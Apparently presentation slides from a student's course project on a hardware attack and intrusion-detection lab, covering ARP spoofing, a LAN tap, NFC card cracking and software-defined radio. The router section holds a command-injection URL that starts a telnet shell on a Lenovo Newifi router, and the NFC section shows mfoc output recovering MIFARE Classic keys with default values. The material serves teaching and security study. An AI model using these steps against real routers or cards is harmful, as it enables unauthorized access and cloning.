基于硬件的中间人攻击

可靠性导论的汇报PPT,介绍了我自己搭建的入侵检测平台,其中包含:

  • Man-in-the-Middle Attack (MITM, 中间人攻击)
  • Lan Tap
  • WiFi Hacking
  • NFC Hacking
  • Software Defined Radio

Man-in-the-Middle Attack (MITM, 中间人攻击)

  • Phone Tapping (电话搭线攻击)

  • ARP Spoofing (ARP 欺骗)

Attacker sends spoofed ARP messages onto a local area network, causing any traffic meant for that IP address to be sent to the attacker instead.(APT Defence Equipment,Firewall)

ARP_Spoofing

Lan Tap

a small, simple device for monitoring Ethernet communications

RJ45 connector,T568B Pair

Test

finish

sniff package

WiFi router(Lenovo Newifi)

CGI vulnerability

http://192.168.99.1/cgi-bin/luci/;stok=XXXXXXXX/admin/wifi_home

newwifi/comcmd?cmd=busybox telnet -p 23|mfg2 telnet 1

newwifi/comcmd?cmd=busybox%20telnetd%20-p%2023|mfg2%20telnet%201

Add TTL Serial Plug






NFC Hacking(RDM8800)

RDM 8800 = Arduino + PN532


NFC List

nfc-list uses libnfc 1.7.1
NFC device: pn532_uart:/dev/ttyUSB0 opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04  
       UID (NFCID1): fa  d6  9c  08  
      SAK (SEL_RES): 08

mfoc -O mycard.mfd

ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00  04  
* UID size: single
* bit frame anticollision supported
  UID (NFCID1): fa  d6  9c  08  
  SAK (SEL_RES): 08  
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [.............xx.]
[Key: a0a1a2a3a4a5] -> [/............xx.]
[Key: d3f7d3f7d3f7] -> [/............xx.]
[Key: 000000000000] -> [/............xx.]
[Key: b0b1b2b3b4b5] -> [/............xx.]

改进



SDR - Software Defined Radio

电视棒(RTL2832U):

USB DVB-T & RTL-SDR Realtek RTL2832U & R820T,这是(Realtek)的一个芯片型号,原本是做电视棒芯片的。

后来被人发现这个芯片具有非常广的频率接收范围,然后就被用来做sdr应用了,rtl的sdr应用。

HackRF

  • SDR peripheral capable of transmission or reception of radio signals from 1 MHz to 6 GHz.
  • Designed to enable test and development of modern and next generation radio technologies
  • HackRF One is an open source hardware platform that can be used as a USB peripheral or programmed for stand-alone operation.

Alternative:bladeRF(support USB3.0,300MHz~3.8GHz)

Dump 1090

ADS-B open-source software
a Mode S decoder specifically designed for RTLSDR devices.


Antenna

L ≈ C / F * 0.96



亚克力